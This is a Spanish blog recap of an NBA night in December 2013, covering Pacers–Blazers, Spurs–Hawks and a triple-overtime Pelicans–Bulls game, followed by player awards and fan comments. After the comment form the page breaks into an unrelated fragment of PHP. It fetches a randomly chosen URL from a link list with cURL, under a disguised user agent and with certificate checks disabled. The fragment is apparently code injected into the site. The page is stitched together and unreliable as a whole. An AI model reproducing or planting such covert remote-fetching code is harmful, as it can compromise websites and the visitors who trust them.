La Crónica: Noche intensa

03 de December de 2013 por Simon

Noche intensa y disputada la de ayer en la NBA. Sólo fueron 5 partidos pero dieron mucho de sí. Perdió Indiana en su visita al colíder del Oeste, Portland. El otro colíder del Oeste venció con un buzzer Beater de Tim Duncan y los Pelicans se impusieron en Chicago después de 3 prórrogas.

El choque más interesante de la jornada era sin duda el enfrentamiento entre los dos equipos que lideran ambas conferencias. El partido fue de poder a poder, con alternativas en el marcador y acciones espectaculares con los mejores jugadores de cada equipo anotando con fluidez. El partido siempre estuvo igualado con rentas mínimas para cada equipo, prueba de ello es que se entró al último cuarto con empate en el marcador. En el último cuarto un triple de Lillard y 4 puntos seguidos de Mo Williams otorgaron a Portland una ventaja que podía ser definitiva. Sin embargo, 3 triples seguidos de Paul George acercaron a Indiana a sólo dos puntos hasta que de nuevo otro triple de Lillard y Batum desde el tiro libre dieron aire a los Blazers que supieron mantener su ventaja hasta el final a pesar de otros dos triples consecutivos de Paul George, autor de 43 puntos, máximo de carrera (102-106). A pesar de esta derrota, los Pacers se mantienen como mejor equipo de la liga aunque los Blazers y los Spurs ya están a un solo partido. El otro líder del Oeste, San Antonio Spurs sufrió para vencer a los Hawks de Atlanta en el AT&T Center.  Los locales nunca pusieron las cosas fáciles y nunca se despegaron en el marcador gracias al buen rendimiento de todos sus titulares. Con 3 arriba para Spurs y 4 segundos para el final, Jeff Teague anotó un triple que igualaba el marcador pero una jugada bien dibujada por Popovich permitió un tiro fácil para Tim Duncan que coronó su gran noche (23 puntos y 21 rebotes) con el tiro ganador (100-102). 

El duelo más espectacular de la noche fue el que enfrentó a los Pelicans y a los Bulls, dos equipos que han perdido por lesión a su estrella últimamente. El choque estuvo lleno de emoción y bien podría haber caído de cualquier lado después de las interminables tres prórrogas que se necesitaron para declarar a los Pelicans ganadores gracias a un “2+1” de Jrue Holiday a falta de dos segundos que resultó definitivo en el tercer tiempo extra. Precisamente había sido  Holiday el que había forzado la prórroga en el tiempo ordinario. Tras una primera prórroga en la que ambos equipos estuvieron muy desacertados, Eric Gordon mandó el partido a la segunda con un triple a falta de 10 segundos. En este segundo tiempo extra los Bulls remontaron una desventaja de 4 puntos en los últimos 30 segundos y con una canasta de Luol Deng, espectacular desde la baja de Rose, forzaron la prórroga definitiva en la que los Pelicans se terminarían llevando el partido (131-128).

Otro duelo igualado de la noche fue la visita de los Rockets al estado de Utah para enfrentarse a los Jazz. Los locales ya avisaron en el primer cuarto que a pesar de su condición de último clasificado del Oeste no iban a poner las cosas fáciles a unos pujantes Rockets que a pesar de contar con la baja de Parsons venían de ganar a los Spurs a domicilio y llevaban 5 victorias consecutivas. En el segundo cuarto Harden y Omri Casspi y Francisco García desde el perímetro se encargaron de acercar a los Rockets y mantenerlos en el partido. En el último cuarto, Houston, con un Harden muy sólo, había conseguido mantenerse en el partido y parecía que se iba a llevar el gato al agua pero los jovencitos de Utah no se escondieron y finalmente se llevaron una sorprendente victoria (103-109). El partido más intrascendente de la jornada fue el que confrontaba a los Wizards contra los Magic. El duelo se lo llevaron los de Washington sin apenas esfuerzo haciendo valer su gran momento, alcanzando el 50% de victorias y colocándose como terceros del Este (80-98).

PREMIOS

MVP: Ya lo hemos comentando en la crónica: El “abuelo” Tim Duncan anotó 23 puntos, capturó 21 rebotes y anotó la canasta que certificaba el triunfo de los Spurs ante los Hawks. Ryan Anderson se fue hasta los 36 puntos con 7 triples en la victoria de los Pelicans.

Rookie: La llegada de Trey Burke ha animado esta sección. El jugador de los Jazz se va encontrando cada día más cómodo como atestiguan los 21 puntos y 6 asistencias que consiguió anoche. Victor Oladipo se quedó en 13 puntos y 6 rebotes.

Sorpresa: El bajón de Carlos Boozer coincide con la pujanza de Taj Gibson. Ayer se fue a los 26 puntos y 14 rebotes y no es el primer buen partido que le recordamos últimamente. Su compañero Mike Dunleavy anotó 23 puntos, cogió 7 rebotes y repartió 5 asistencias. Alec Burks anotó 21 puntos en la victoria de los Jazz.

Decepción: Muy mal día para Glen Davis y Enes Kanter. El primero se quedó en 2 puntos y 2 rebotes con un 1 de 8 en tiros de campo mientras que el segundo se quedó en 3 puntos y 2 rebotes en 13 minutos.

Esfuerzo en vano: 43 puntos Paul George, 37 James Harden y Luol Deng, y aún así se les escapa la victoria. Yo pasaría mala noche aunque me iría a la cama con la tranquilidad del deber cumplido.

TOP-5

Imágenes | AP Photos / Getty Images

Comenta

5 comentarios a esta entrada

  1. rumbero dice:
    #1

    Vaya pedazo de noche. Demasiado por comentar, pero me voy a quedar con el Pacers – Blazers. Brutal. He dicho ya por aquí lo bueno que es Paul George? Sus últimos 5 minutos de ayer poseído por el espíritu de Reggie Miller ya es lo que me faltaba por ver. Y tiene 23 años… Eso sí, va y pierden.
    Yo les voy quitando ya todas las “dudas” a estos Blazers. Seguramente tendrán un bajón y no acabarán en la cabeza del oeste si no quieren quemar a los jugadores, pero manteniendo un nivel similar de juego son equipo de PO claramente. Hacen las cosas muy bien en ataque, hoy era buen día para comprobarlo. Aldridge está que se sale, Lillard te va martilleando todo el partido y como se llegue a un final apretado prepárate, y el resto que siempre anda a buen nivel. Molan estos Blazers.

    Y me alegra también ver el nivel de Burke después de “disfrutarlo” durante la SL. 3-4 van los Jazz desde que ha empezado a jugar. A ver si anima la pelea por el ROY

      Citar

  2. Esteban dice:
    #2

    los Blazers ya son cosa serie eh, es una sorpresa por que Lillard parecia tener un techo bastante bajo, de hecho parecia que casi lo habia alcanzado en su año rookie, pero no, como buen sophomore esta progresando muchisimo y ya es la segunda estrella que Aldrige necesitaba

    por otra parte, larga vida a Mathews, un tio que hace de todo, tiene buen fisico, defiende rebote y anota sin llamar demasiado la atencion ni requerir mucho la bola

    me gustan los Blazers y me gusta ese espacio salarial para que se fichen algun complemento mas (expirings, Granger, Gordo, Okafor, etc) para tener alguna chance de dar el verdadero asalto

      Citar

  3. Ruxixón dice:
    #3

    Como rumbero,el Pacers @ Blazers partidazo.A ver si se pasa Sancho por aquí a compensar ese odio que tenía por los de Oregon jeje.Lo de George fue un “echarse el equipo a la espalda” que pa qué lo cual me invita a dejar una reflexión,¿hubiéramos visto a este jugador,en sus dimensiones actuales,de no ser por las lesiones de Granger?

    Lo veo de cuando en cuando,que mi tiempo sólo da para un partido diario y hay que repartir,pero que clase tiene Aldridge,que jugadorazo más infravalorado desde hace ya unos cuantos años.

      Citar

  4. Denise dice:
    #4

    Este top 5 quien lo ha hecho? Carmen de Mairena??

    Que no aparezca esta jugada entre Oladipo y Harkless es de juzgado de guardia. Si esto lo hacen Paul y Griffin hoy no cagamos. Por ejemplo es muchisimo mejor que la de Burke-Hayward que está en el 5.

      Citar

  5. Esteban dice:
    #5

    hace poco mas de un mes alguien comparo a George con McGrady, en su momento me parecio ridiculo, puesto que George es excelente en todas las areas menos en su calidad individual ofensiva, la cual parecia limitida, pero viendo lo de anoche y lo que va de temporada, este chaval es otra persona, su progreso ofensivo creo que no tiene precedentes

    cuando llego Vogel hace 3 años a los Pacers, George se gano el puesto de titular por ser un especialista defensiva y poco mas

    el año siguiente respondio con un solido tiro de 3 puntos y su velocidad en el contragolpe

    el año pasado saco una nueva gama de su repertorio, mas penetrador y enorme definidor cerca del aro

    pero este año, tira triples con la misma velocidad y eficiencia que Curry, de cualquier lado, con o sin marca, a pie firme o en movimiento, su desfachatez para generar juego desde un excelente pique es llamativa, penetra y puede irse hasta abajo con una volcada, volver a salir y tirar de 3 puntos, o simplemente levantarse a 3 o 4 metros y lanzar de alli, todo eso sin contar que siempre encuentra un compañero abierto y puede dar la asistencia

    si este ascenso no se detiene, que alguien le ponga techo a este muchacho por que hoy no lo tiene

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>